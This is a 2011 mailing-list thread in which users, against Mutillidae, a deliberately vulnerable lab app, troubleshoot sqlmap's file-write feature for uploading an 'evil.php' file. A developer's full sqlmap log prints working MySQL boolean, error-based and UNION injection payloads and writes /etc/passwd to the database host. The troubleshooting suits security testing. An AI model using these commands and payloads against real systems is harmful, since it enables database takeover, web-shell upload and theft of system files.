Hi Thanks. It turns out I was being an idiot. With absolute paths I didn't realise that this also includes the destination file name. With that included, it works like a dream.
What I haven't managed to get going properly yet is the --os-cmd flag. The temp stager file does appear, but is empty, 0KB. However; I think I'll save that one for another day! Regards Chris ------------------ -----Original Message----- From: "Bernardo Damele A. G." <bernardo.dam...@gmail.com> Date: Wed, 6 Jul 2011 23:42:22 To: Chris Oakley<christopher.oak...@gmail.com> Cc: <sqlmap-users@lists.sourceforge.net> Subject: Re: [sqlmap-users] File Writing Hi Chris, To me it works well: --8<-- $ python sqlmap.py -u "http://debian32/mutillidae/index.php?page=user-info.php"; --forms -p view_user_name --risk 3 --level 3 --parse-errors --file-write /etc/passwd --file-dest /tmp/test --flush-session sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 23:26:35 [23:26:35] [INFO] setting file for logging HTTP traffic [23:26:35] [INFO] testing connection to the target url [23:26:35] [INFO] heuristics detected web page charset 'ascii' [23:26:35] [INFO] searching for forms [#1] form: POST http://debian32:80/mutillidae/index.php?page=user-info.php POST data: view_user_name=&password=&Submit_button=Submit do you want to test this form? [Y/n/q] > Edit POST data [default: view_user_name=&password=&Submit_button=Submit] (Warning: blank fields detected): do you want to fill blank fields with random values? [Y/n] [23:26:37] [WARNING] the testable parameter 'view_user_name' you provided is not inside the GET [23:26:37] [INFO] using '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session' as session file [23:26:37] [INFO] flushing session file [23:26:37] [INFO] using '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv' as results file [23:26:37] [INFO] heuristics detected web page charset 'ascii' [23:26:37] [INFO] testing if the url is stable, wait a few seconds [23:26:38] [INFO] url is stable [23:26:38] [INFO] heuristic test shows that POST parameter 'view_user_name' might be injectable (possible DBMS: MySQL) [23:26:38] [INFO] testing sql injection on POST parameter 'view_user_name' [23:26:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [23:26:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause' [23:26:42] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)' [23:26:42] [INFO] POST parameter 'view_user_name' is 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)' injectable [23:26:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [23:26:42] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause' [23:26:42] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause' [23:26:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause' [23:26:42] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause' [23:26:42] [INFO] POST parameter 'view_user_name' is 'MySQL OR error-based - WHERE or HAVING clause' injectable [23:26:42] [INFO] testing 'MySQL > 5.0.11 stacked queries' [23:26:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [23:26:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [23:26:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)' [23:26:42] [INFO] testing 'MySQL > 5.0.11 OR time-based blind' [23:26:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [23:26:43] [INFO] target url appears to be UNION injectable with 4 columns [23:26:43] [INFO] POST parameter 'view_user_name' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable [23:26:43] [WARNING] in OR boolean-based injections, please consider usage of switch --drop-set-cookie if you experience any problems during data retrieval POST parameter 'view_user_name' is vulnerable. Do you want to keep testing the others? [y/N] sqlmap identified the following injection points with a total of 148 HTTP(s) requests: --- Place: POST Parameter: view_user_name Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment) Payload: view_user_name=-5244' OR NOT (1884=1884)-- &password=bDXj&Submit_button=Submit Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: view_user_name=-3024' OR 1 GROUP BY CONCAT(CHAR(58,97,108,119,58),(SELECT (CASE WHEN (8877=8877) THEN 1 ELSE 0 END)),CHAR(58,112,119,98,58),FLOOR(RAND(0)*2)) HAVING MIN(0)-- &password=bDXj&Submit_button=Submit Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: view_user_name=IZBb' UNION ALL SELECT NULL, CONCAT(CHAR(58,97,108,119,58),IFNULL(CAST(CHAR(121,74,77,117,83,105,112,118,99,84) AS CHAR),CHAR(32)),CHAR(58,112,119,98,58)), NULL, NULL#&password=bDXj&Submit_button=Submit --- do you want to exploit this SQL injection? [Y/n] [23:26:46] [INFO] testing MySQL [23:26:46] [INFO] confirming MySQL [23:26:46] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.2.6, Apache 2.2.9 back-end DBMS: MySQL >= 5.0.0 [23:26:46] [INFO] fingerprinting the back-end DBMS operating system [23:26:46] [INFO] the back-end DBMS operating system is Linux [23:26:46] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues) do you want confirmation that the file '/tmp/test' has been successfully written on the back-end DBMS file system? [Y/n] [23:26:48] [INFO] the file has been successfully written and its size is 1848 bytes, but the size differs from the local file '/etc/passwd' (1845 bytes) [23:26:48] [WARNING] expect junk characters inside the file as a leftover from UNION query [23:26:48] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv' [*] shutting down at 23:26:48 --8<-- Cheers, Bernardo On 3 July 2011 18:03, Chris Oakley <christopher.oak...@gmail.com> wrote: > Hi > > I'm playing with file writing. I have a full privs root user set up in > mysql and am using > http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10 > to play with. I've set up a /temp folder below the web root of the app. > I've put a file "evil.php" in the sqlmap working directory. I've also > changed the permissions for all users on the temp folder to write access > allowed. > > I'm using the following input to try and upload this file: > > C:\Program Files\sqlmap-0.9>python sqlmap.py -u > "http://localhost/mutillidae/ind > ex.php?page=user-info.php" --data > "username=&password=&user-info-php-submit-butt > on=View+Account+Details" -p "username" --proxy "http://127.0.0.1:8085"; > --file-wr > ite "evil.php" --file-dest "temp/evil.php" > > This is with the latest dev build by the way. > > The output I get is: > > [18:00:03] [INFO] the back-end DBMS is MySQL > web server operating system: Windows > web application technology: PHP 5.3.5, Apache 2.2.17 > back-end DBMS: MySQL 5.0 > [18:00:03] [INFO] fingerprinting the back-end DBMS operating system > [18:00:03] [INFO] the back-end DBMS operating system is Windows > [18:00:04] [WARNING] if the problem persists with 'None' values please try > to us > e hidden switch --no-cast (fixing problems with some collation issues) > do you want confirmation that the file 'temp/evil.php' has been successfully > wri > tten on the back-end DBMS file system? [Y/n] > [18:00:12] [WARNING] it looks like the file has not been written, this can > occur > if the DBMS process' user has no write privileges in the destination path > [18:00:12] [WARNING] expect junk characters inside the file as a leftover > from U > NION query > [18:00:12] [INFO] Fetched data logged to text files under 'C:\Program > Files\sqlm > ap-0.9\output\localhost' > > [*] shutting down at 18:00:12 > > and sure enough the file isn't written. I've also tried using the --no-cast > switch, to no avail. > > Does anyone have any ideas on what could be going wrong here? I can use the > --file-read switch to read any file such as C:\boot.ini. The --os-cmd and > --os-pwn commands also fail at the stager upload phase, probably for similar > reasons. > > Any help would be appreciated > > Cheers > > Chris > > > ------------------------------------------------------------------------------ > All of the data generated in your IT infrastructure is seriously valuable. > Why? It contains a definitive record of application performance, security > threats, fraudulent activity, and more. Splunk takes this data and makes > sense of it. IT sense. And common sense. > http://p.sf.net/sfu/splunk-d2d-c2 >_______________________________________________ > sqlmap-users mailing list > sqlmap-users@lists.sourceforge.net > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable ------------------------------------------------------------------------------ All of the data generated in your IT infrastructure is seriously valuable. Why? It contains a definitive record of application performance, security threats, fraudulent activity, and more. Splunk takes this data and makes sense of it. IT sense. And common sense. http://p.sf.net/sfu/splunk-d2d-c2 _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
